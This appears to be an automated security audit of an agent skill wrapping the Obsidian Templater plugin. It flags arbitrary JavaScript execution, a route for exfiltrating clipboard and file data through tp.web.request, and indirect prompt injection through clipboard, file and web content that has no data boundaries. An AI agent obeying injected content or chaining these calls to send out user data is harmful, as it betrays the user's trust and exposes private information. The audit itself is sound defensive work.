templater
Warn
Audited by Gen Agent Trust Hub on Apr 16, 2026
Risk Level: MEDIUMCOMMAND_EXECUTIONDATA_EXFILTRATIONEXTERNAL_DOWNLOADS
Full Analysis
- [COMMAND_EXECUTION]: The skill documents the use of Templater's execution syntax (
<%* ... %>), which allows for the execution of arbitrary JavaScript statements within the application environment. - [DATA_EXFILTRATION]: The documentation highlights the
tp.web.requestmodule for making HTTP requests alongside modules that access sensitive local data. - Evidence: Use of
tp.system.clipboard()for reading clipboard content. - Evidence: Use of
tp.file.contentandtp.file.path(false)(absolute path) for accessing local file data. - Risk: These can be combined with
tp.web.request(url)to transmit sensitive data to external servers. - [EXTERNAL_DOWNLOADS]: The
tp.web.requestfunction allows the agent to fetch content from arbitrary external URLs, which may contain untrusted data or instructions. - [PROMPT_INJECTION]: The skill facilitates the ingestion of untrusted data from multiple sources which can influence agent behavior (Indirect Prompt Injection).
- Ingestion points:
tp.system.clipboard(),tp.file.content, andtp.web.request()allow external content to enter the agent's context. - Boundary markers: No specific delimiters or safety instructions are provided to the agent to treat this external content as data rather than instructions.
- Capability inventory: The skill possesses significant capabilities including file creation (
tp.file.create_new), file movement (tp.file.move), and network requests (tp.web.request). - Sanitization: The instructions do not specify any validation or sanitization requirements for the external data being processed.
Audit Metadata